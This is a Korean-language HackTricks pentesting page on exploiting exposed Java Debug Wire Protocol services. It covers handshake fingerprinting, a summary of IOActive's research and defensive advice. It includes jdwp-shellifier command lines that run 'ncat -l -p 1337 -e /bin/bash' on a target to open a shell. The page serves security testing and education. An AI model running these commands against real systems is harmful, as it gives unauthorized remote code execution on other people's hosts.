Pentesting JDWP - Java Debug Wire Protocol

Tip

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE) Azure 해킹 배우기 및 연습하기: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks 지원하기

• 구독 계획 확인하기!
• **💬 디스코드 그룹 또는 텔레그램 그룹에 참여하거나 트위터 🐦 @hacktricks_live를 팔로우하세요.
• HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.

Exploiting

JDWP 악용은 프로토콜의 인증 및 암호화 부족에 달려 있습니다. 일반적으로 포트 8000에서 발견되지만 다른 포트도 가능합니다. 초기 연결은 대상 포트에 “JDWP-Handshake“를 전송하여 이루어집니다. JDWP 서비스가 활성화되어 있으면 동일한 문자열로 응답하여 존재를 확인합니다. 이 핸드셰이크는 네트워크에서 JDWP 서비스를 식별하는 지문 인식 방법으로 작용합니다.

프로세스 식별 측면에서 Java 프로세스에서 “jdwk” 문자열을 검색하면 활성 JDWP 세션을 나타낼 수 있습니다.

주요 도구는 jdwp-shellifier입니다. 다양한 매개변수와 함께 사용할 수 있습니다:

./jdwp-shellifier.py -t 192.168.2.9 -p 8000 #Obtain internal data
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --cmd 'ncat -l -p 1337 -e /bin/bash' #Exec something
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --break-on 'java.lang.String.indexOf' --cmd 'ncat -l -p 1337 -e /bin/bash' #Uses java.lang.String.indexOf as breakpoint instead of java.net.ServerSocket.accept

--break-on 'java.lang.String.indexOf'의 사용이 익스플로잇을 더 안정적으로 만든다는 것을 발견했습니다. 그리고 호스트에 백도어를 업로드하고 명령을 실행하는 대신 실행할 기회가 있다면, 익스플로잇은 더욱 안정적일 것입니다.

더 많은 세부정보

이것은 https://ioactive.com/hacking-java-debug-wire-protocol-or-how/의 요약입니다. 추가 세부정보는 해당 링크를 확인하세요.

1. JDWP 개요:

• 패킷 기반의 네트워크 이진 프로토콜로, 주로 동기식입니다.
• 인증 및 암호화가 부족하여 적대적인 네트워크에 노출될 경우 취약합니다.

2. JDWP 핸드셰이크:

• 통신을 시작하기 위해 간단한 핸드셰이크 프로세스가 사용됩니다. 디버거(클라이언트)와 디버기(서버) 간에 14자 ASCII 문자열 “JDWP-Handshake”가 교환됩니다.

3. JDWP 통신:

• 메시지는 길이, ID, 플래그 및 CommandSet과 같은 필드를 가진 간단한 구조를 가지고 있습니다.
• CommandSet 값은 0x40에서 0x80까지 다양하며, 서로 다른 동작 및 이벤트를 나타냅니다.

4. 익스플로잇:

• JDWP는 임의의 클래스와 바이트코드를 로드하고 호출할 수 있게 하여 보안 위험을 초래합니다.
• 이 기사는 Java Runtime 참조를 가져오고, 중단점을 설정하고, 메서드를 호출하는 다섯 단계의 익스플로잇 프로세스를 자세히 설명합니다.

5. 실제 익스플로잇:

• 잠재적인 방화벽 보호에도 불구하고, JDWP 서비스는 발견 가능하며 실제 시나리오에서 익스플로잇될 수 있습니다. 이는 ShodanHQ 및 GitHub와 같은 플랫폼에서의 검색을 통해 입증됩니다.
• 익스플로잇 스크립트는 다양한 JDK 버전에서 테스트되었으며, 플랫폼에 독립적이며 신뢰할 수 있는 원격 코드 실행(RCE)을 제공합니다.

6. 보안 의미:

• 인터넷에 열린 JDWP 서비스의 존재는 정기적인 보안 검토의 필요성을 강조하며, 프로덕션에서 디버그 기능을 비활성화하고 적절한 방화벽 구성을 요구합니다.

참고자료:

• [https://ioactive.com/hacking-java-debug-wire-protocol-or-how/]
• https://github.com/IOActive/jdwp-shellifier
• http://docs.oracle.com/javase/7/docs/technotes/guides/jpda/architecture.html
• http://www.secdev.org/projects/scapy(더 이상 활성화되지 않음)
• http://www.shodanhq.com/search?q=JDWP-HANDSHAKE
• http://www.hsc-news.com/archives/2013/000109.html (더 이상 활성화되지 않음)
• http://packetstormsecurity.com/files/download/122525/JDWP-exploitation.txt
• https://github.com/search?q=-Xdebug+-Xrunjdwp&type=Code&ref=searchresults
• http://docs.oracle.com/javase/6/docs/api/java/lang/Runtime.html
• http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp-spec.html
• http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html
• http://nmap.org/nsedoc/scripts/jdwp-exec.html

Tip

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE) Azure 해킹 배우기 및 연습하기: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks 지원하기

• 구독 계획 확인하기!
• **💬 디스코드 그룹 또는 텔레그램 그룹에 참여하거나 트위터 🐦 @hacktricks_live를 팔로우하세요.
• HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.